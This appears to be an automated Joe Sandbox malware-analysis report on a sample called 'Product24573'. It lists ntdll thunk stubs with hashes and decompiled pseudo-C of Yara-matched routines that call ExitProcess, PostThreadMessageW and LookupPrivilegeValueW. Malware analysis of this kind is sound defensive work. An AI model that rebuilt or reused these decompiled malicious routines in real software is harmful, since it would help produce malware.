                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bd3304406254d8f13aee9664d3538e0ec63223c6c29387d3760286d68e6a2619
                                          • Instruction ID: 244610f2c492f0db7d9df2218ac86cfca13e099fbd5e18c5558992380f11978e
                                          • Opcode Fuzzy Hash: bd3304406254d8f13aee9664d3538e0ec63223c6c29387d3760286d68e6a2619
                                          • Instruction Fuzzy Hash: BE900271342041535D49B19955045074006B7F0691791C016A1405990CC6669856E665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f701a77af278721f3b321c034a5c6856d8da27231cc54486ee3b9dbfe83b82bc
                                          • Instruction ID: 973b2df3ef93e6f341729cf57ace89b43c85c49c0b4e135dc1d2d22b87e2e9f8
                                          • Opcode Fuzzy Hash: f701a77af278721f3b321c034a5c6856d8da27231cc54486ee3b9dbfe83b82bc
                                          • Instruction Fuzzy Hash: D590027130100413D915619956047070009A7E0691F91C416A0415598DD7968952B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011398F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4b60c9515518e3687938ac3655557ca1fdd598c2d270e4be605a1b4755e71d8c
                                          • Instruction ID: 9431a19cb726f67ecc1478fc45d48a4250bdddada378ea3df54eee3d9f3ce365
                                          • Opcode Fuzzy Hash: 4b60c9515518e3687938ac3655557ca1fdd598c2d270e4be605a1b4755e71d8c
                                          • Instruction Fuzzy Hash: 1C90027170100503D90571995504616000AA7E0691F91C026A1015595ECB658992B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 96a98e89b69009c8214932234fdd35de569b865ef6b88e5ccaf454db053bad87
                                          • Instruction ID: 67517830399e95470f3dd6cabab08f3b476acd04a3e4c2c07871b32b6640e143
                                          • Opcode Fuzzy Hash: 96a98e89b69009c8214932234fdd35de569b865ef6b88e5ccaf454db053bad87
                                          • Instruction Fuzzy Hash: 1790027130140403D9046199591470B0005A7E0752F51C015A1155595DC765885175B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 83fad150197e16edef0a114065524cabae1a515c4770befb01ac1ee94324bc54
                                          • Instruction ID: 528838dd1e17f24225d7bbf45c7ce36684d15bba0ccb9b1b4e90fc513abd76ce
                                          • Opcode Fuzzy Hash: 83fad150197e16edef0a114065524cabae1a515c4770befb01ac1ee94324bc54
                                          • Instruction Fuzzy Hash: AC90027170100043494471A999449064005BBF1661751C125A0989590DC699886566A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d351c5e1acbbc8a4ca49459f487670c66d5108228c506f14a66ac24aea3ad9a3
                                          • Instruction ID: cfd859c37eea5da7af6b8291a881863a2b2f4ae776405510b6ccfa009270d21f
                                          • Opcode Fuzzy Hash: d351c5e1acbbc8a4ca49459f487670c66d5108228c506f14a66ac24aea3ad9a3
                                          • Instruction Fuzzy Hash: 2F90027131180043DA0465A95D14B070005A7E0753F51C119A0145594CCA5588616565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 85597da755fd06631a0b56fcee461503243ae664c669337d83c33bd8016fe462
                                          • Instruction ID: 5a030721dd4ffd038a2ecf12f3649fac2d9a424424f00afe03b8d036e468495c
                                          • Opcode Fuzzy Hash: 85597da755fd06631a0b56fcee461503243ae664c669337d83c33bd8016fe462
                                          • Instruction Fuzzy Hash: B2900275311000030909A59917045070046A7E57A1351C025F1006590CD76188616165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011395D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 55452200b1c65ab17347af14180951deb24d828ec078a86ee5c717d9cf9bfcbf
                                          • Instruction ID: 3ce414874420078e4251248f47f8f0fd39e814a928f2ead32d164f4b478db0bf
                                          • Opcode Fuzzy Hash: 55452200b1c65ab17347af14180951deb24d828ec078a86ee5c717d9cf9bfcbf
                                          • Instruction Fuzzy Hash: 7E9002B130200003490971995514616400AA7F0651B51C025E10055D0DC66588917169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 198287d1c4fa6c2790679950207fae6688b852aca9f9fc594f70fad25c7e3ff6
                                          • Instruction ID: 7741e8245a2d7a630896fea978fbb38ff7f11a013d9ffe3ebe31e6a26dd95d2b
                                          • Opcode Fuzzy Hash: 198287d1c4fa6c2790679950207fae6688b852aca9f9fc594f70fad25c7e3ff6
                                          • Instruction Fuzzy Hash: AC90027130100403D90465D965086460005A7F0751F51D015A5015595EC7A588917175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2c84759213a3f5e01527c92198e6eac7b43abe20f9818508558fb6be69a48eeb
                                          • Instruction ID: eae6e6e5502e0e74aa0dd757a670890e6363e8ca72c064278632d73388ec9791
                                          • Opcode Fuzzy Hash: 2c84759213a3f5e01527c92198e6eac7b43abe20f9818508558fb6be69a48eeb
                                          • Instruction Fuzzy Hash: 2190027931300003D9847199650860A0005A7E1652F91D419A0006598CCA5588696365
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011397A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a784e609d2a788a12ba5ff9c569602f09e61a1ed6791e608dfbd51237781dddd
                                          • Instruction ID: 728c9b976c44fb6ec94998fbb4aaaa4723e0eb40cba836c45cc572fa4f9fa468
                                          • Opcode Fuzzy Hash: a784e609d2a788a12ba5ff9c569602f09e61a1ed6791e608dfbd51237781dddd
                                          • Instruction Fuzzy Hash: 9490027130100003D944719965186064005F7F1751F51D015E0405594CDA5588566266
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7cc1172fd9b05ae6fa70dcd21367c0b61a007c7af75204c76ac303ba898f3317
                                          • Instruction ID: 857bc55444fd81d3087c47322ccc90318cb7091e3d041fbb9c31ff75d98bfc41
                                          • Opcode Fuzzy Hash: 7cc1172fd9b05ae6fa70dcd21367c0b61a007c7af75204c76ac303ba898f3317
                                          • Instruction Fuzzy Hash: 7B90027131114403D914619995047060005A7E1651F51C415A0815598DC7D588917166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0b82766ae1315af3baa8bec6a26ba3eefc2f48fb890732df5866b4e1bcb24cb7
                                          • Instruction ID: 8435e9d5b0f2204a525746ba711e24bc03c709f2452edde69d87fb758dedb2ba
                                          • Opcode Fuzzy Hash: 0b82766ae1315af3baa8bec6a26ba3eefc2f48fb890732df5866b4e1bcb24cb7
                                          • Instruction Fuzzy Hash: 6E90027130100803D9847199550464A0005A7E1751F91C019A0016694DCB558A5977E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011396E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d09e26c7e653cb16c3834bb2473af34966ee7605c569de3174d204e5b1e0f508
                                          • Instruction ID: fb397943238f639c1e72ebdcd44bd1372eb475d2a5fa779ee106571c606d5f45
                                          • Opcode Fuzzy Hash: d09e26c7e653cb16c3834bb2473af34966ee7605c569de3174d204e5b1e0f508
                                          • Instruction Fuzzy Hash: 0F90027130108803D9146199950474A0005A7E0751F55C415A4415698DC7D588917165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41e8b3-41e8df call 41f1b3 ExitProcess
                                          C-Code - Quality: 100%
                                          			E0041E8B3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x9b0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x9b0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                          0x0041e8b6
                                          0x0041e8cd
                                          0x0041e8db

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: w5@
                                          • API String ID: 621844428-2048009441
                                          • Opcode ID: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                          • Instruction ID: 1ed00d9a66ebf349a6f1bdeba4fc8f4a3585a7d1f921a18fc4373dfdb201933d
                                          • Opcode Fuzzy Hash: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                          • Instruction Fuzzy Hash: B6D01272600314BBD620DB99DC45FD777ACDF456A4F054065BA4C5B242C674BA10C7E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040992B Relevance: 1.7, APIs: 1, Instructions: 185threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 337 40992b-409931 338 409933-40998b call 420183 call 409893 call 41f9d3 337->338 339 4098cf-4098e7 call 402e13 call 4195b3 337->339 353 409993-4099c5 call 4102e3 call 41e703 338->353 349 409920-409926 339->349 350 4098e9-4098fa PostThreadMessageW 339->350 350->349 352 4098fc-40991d call 40c5d3 350->352 352->349 360 4099c7-4099cf 353->360 361 4099fa-409a02 353->361 362 4099d1-4099d8 360->362 363 4099e9-4099f3 360->363 362->363 364 4099da-4099e1 362->364 363->353 365 4099f5-4099f8 363->365 364->363 366 4099e3-4099e7 364->366 367 409a20-409a32 call 41e693 365->367 366->363 368 409a03-409a1d call 420103 366->368 367->361 372 409a34-409a9f call 41df13 367->372 368->367 372->361 376 409aa5-409b01 call 41df53 372->376 376->361 379 409b07-409b54 call 41f673 call 41f693 call 420323 call 420103 call 4191a3 376->379
                                          C-Code - Quality: 75%
                                          			E0040992B(void* __eflags, intOrPtr _a4, int _a8, int _a12, int _a16) {
				int _v8;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __ebx;
				intOrPtr __edi;
				int __esi;
				int _t60;
				void* _t63;
				void* _t67;
				long _t69;
				void* _t70;
				int _t71;

				asm("sahf");
				if(__eflags < 0) {
					_t60 = E004195B3(_t70, _t67, 0, 0, E00402E13());
					_t71 = _t60;
					if(_t71 != 0) {
						_t69 =  *0xFFFFFFFFF2FE0EE5;
						_t60 = PostThreadMessageW(_t69, 0x111, 0, 0); // executed
						if(_t60 == 0) {
							_t3 = (E0040C5D3(1, 8, _t63 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
							_t60 =  *_t71(_t69, 0x8003, 0xf2fe0ed9 + _t3, _t60);
						}
					}
					return _t60;
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E00420183( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E00409893(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041F9D3(__ecx);
					_t12 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t12;
					_a16 = 0;
					while(1) {
						__eax = E004102E3(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E703(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L11:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L15;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L11;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L11;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420103(_a12,  &_v688, 0x2a8);
										L15:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E693(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t32 = __esi + 0x2e8; // 0x2e8
											__eax = _t32;
											 *_t32 = _v136;
											__eax = _a12;
											_t34 = __esi + 0x314; // 0x314
											__ebx = _t34;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF13(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t42 = __esi + 0x2e0; // 0x2e0
												__eax = _t42;
												_push(_t42);
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												__ecx = _a12;
												_push(__ebx);
												_push(0x1a);
												__ecx = _a12 + 0x224;
												_push(_a12 + 0x224);
												 *(__esi + 0x2e4) = __edx;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E0041DF53(__ebx, __edx, __edi);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041F673(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E00420323( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t57 = __eax + 2; // 0x2
													__ecx = __eax + _t57;
													__eax =  &_v656;
													__eax = E004191A3(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L11;
									}
								}
							}
						}
						goto L19;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L19:
			}



















                                          0x0040992b
                                          0x00409931
                                          0x004098db
                                          0x004098e0
                                          0x004098e7
                                          0x004098e9
                                          0x004098f6
                                          0x004098fa
                                          0x00409913
                                          0x0040991e
                                          0x0040991e
                                          0x004098fa
                                          0x00409926
                                          0x00409933
                                          0x00409933
                                          0x00409934
                                          0x00409936
                                          0x0040993c
                                          0x0040993d
                                          0x0040993e
                                          0x0040993f
                                          0x00409947
                                          0x0040994a
                                          0x00409957
                                          0x0040995c
                                          0x0040995f
                                          0x00409965
                                          0x0040996a
                                          0x00409972
                                          0x0040997d
                                          0x0040997d
                                          0x00409984
                                          0x00409993
                                          0x00409999
                                          0x0040999e
                                          0x004099ab
                                          0x004099b5
                                          0x004099bd
                                          0x004099c3
                                          0x004099c5
                                          0x00000000
                                          0x00000000
                                          0x004099c7
                                          0x004099cf
                                          0x004099e9
                                          0x004099e9
                                          0x004099ec
                                          0x004099ed
                                          0x004099f0
                                          0x004099f3
                                          0x00000000
                                          0x004099f5
                                          0x004099f5
                                          0x00000000
                                          0x004099f5
                                          0x004099d1
                                          0x004099d1
                                          0x004099d8
                                          0x00000000
                                          0x004099da
                                          0x004099da
                                          0x004099e1
                                          0x00000000
                                          0x004099e3
                                          0x004099e3
                                          0x004099e7
                                          0x00409a03
                                          0x00409a0b
                                          0x00409a13
                                          0x00409a18
                                          0x00409a20
                                          0x00409a20
                                          0x00409a28
                                          0x00409a30
                                          0x00409a32
                                          0x00000000
                                          0x00409a34
                                          0x00409a34
                                          0x00409a3a
                                          0x00409a3d
                                          0x00409a43
                                          0x00409a46
                                          0x00409a4c
                                          0x00409a4c
                                          0x00409a53
                                          0x00409a55
                                          0x00409a58
                                          0x00409a58
                                          0x00409a5f
                                          0x00409a62
                                          0x00409a69
                                          0x00409a6f
                                          0x00409a75
                                          0x00409a7b
                                          0x00409a81
                                          0x00409a87
                                          0x00409a8d
                                          0x00409a92
                                          0x00409a97
                                          0x00409a9d
                                          0x00409a9f
                                          0x00000000
                                          0x00409aa5
                                          0x00409aa5
                                          0x00409aa8
                                          0x00409aa8
                                          0x00409aae
                                          0x00409aaf
                                          0x00409ab5
                                          0x00409abb
                                          0x00409ac1
                                          0x00409ac7
                                          0x00409acd
                                          0x00409ad0
                                          0x00409ad1
                                          0x00409ad3
                                          0x00409ad9
                                          0x00409adb
                                          0x00409ae1
                                          0x00409ae7
                                          0x00409af1
                                          0x00409af9
                                          0x00409aff
                                          0x00409b01
                                          0x00000000
                                          0x00409b07
                                          0x00409b07
                                          0x00409b0d
                                          0x00409b0d
                                          0x00409b13
                                          0x00409b20
                                          0x00409b22
                                          0x00409b26
                                          0x00409b2b
                                          0x00409b2e
                                          0x00409b2e
                                          0x00409b3e
                                          0x00409b46
                                          0x00409b4e
                                          0x00409b4f
                                          0x00409b50
                                          0x00409b51
                                          0x00409b53
                                          0x00409b54
                                          0x00409b54
                                          0x00409b01
                                          0x00409a9f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004099e7
                                          0x004099e1
                                          0x004099d8
                                          0x00000000
                                          0x004099cf
                                          0x004099fa
                                          0x004099fb
                                          0x004099fc
                                          0x004099fc
                                          0x004099fe
                                          0x004099ff
                                          0x00409a01
                                          0x00409a02
                                          0x00409a02
                                          0x00000000

                                          APIs
                                          • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                          • Instruction ID: 42ad5854a2e7b942de746f5d6c01182a578b4c63b133ec1084285a3336115312
                                          • Opcode Fuzzy Hash: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                          • Instruction Fuzzy Hash: F461B4B0A00305AFD724DF65DC86BEB73A8EB45304F00457EF949A7381DB74AE418BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409893 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 71%
                                          			E00409893(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				void* _t24;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420183( &_v67, 0, 0x3f);
				E00420C33( &_v68, 3);
				_t19 = _a4;
				_t26 = _a4 + 0x20;
				_t13 = E0040CF03(_t32, _a4 + 0x20,  &_v68); // executed
				_push(0xbf25f8a5);
				_t24 = _t13;
				_t15 = E004195B3(_t26, _t24, 0, 0, E00402E13());
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t9 = (E0040C5D3(1, 8, _t19 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
						return  *_t27(_t25, 0x8003, _t28 + _t9, _t15);
					}
				}
				return _t15;
			}












                                          0x00409893
                                          0x004098a4
                                          0x004098a8
                                          0x004098b3
                                          0x004098b8
                                          0x004098bf
                                          0x004098c3
                                          0x004098c8
                                          0x004098cd
                                          0x004098db
                                          0x004098e0
                                          0x004098e7
                                          0x004098e9
                                          0x004098f6
                                          0x004098fa
                                          0x00409913
                                          0x00000000
                                          0x0040991e
                                          0x004098fa
                                          0x00409926

                                          APIs
                                          • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                          • Instruction ID: 97372187852fa5e1adf49ca0e465a128001ac0af3e8014b44584ab3ce766e153
                                          • Opcode Fuzzy Hash: 7b07a314828948d52822fcdb3d0547e717b50667b0a4eb79118b390bfcbb0459
                                          • Instruction Fuzzy Hash: 95019B71A8031876E7216691DC42FEF776C9B44B54F54012DFF047A1C2D6E8AA0587E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E9C5 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 431 41e9c5-41e9d0 432 41e9b3-41e9c3 431->432 433 41e9d2-41e9ed call 41f1b3 431->433 435 41e9f2-41ea07 LookupPrivilegeValueW 433->435
                                          C-Code - Quality: 64%
                                          			E0041E9C5(void* __eax, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v117;
				int _t16;

				asm("o16 fstp tword [esi-0x25de8b42]");
				asm("loop 0xffffffe3");
				ss = _v117;
				_t13 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x764)), _t13, _t13 + 0xab8,  *((intOrPtr*)(_a4 + 0x764)), 0, 0x46);
				_t16 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t16;
			}





                                          0x0041e9c9
                                          0x0041e9d0
                                          0x0041e9d2
                                          0x0041e9d6
                                          0x0041e9ed
                                          0x0041ea03
                                          0x0041ea07

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE95,0040FE95,?,00000000,?,?), ref: 0041EA03
                                          Memory Dump Source
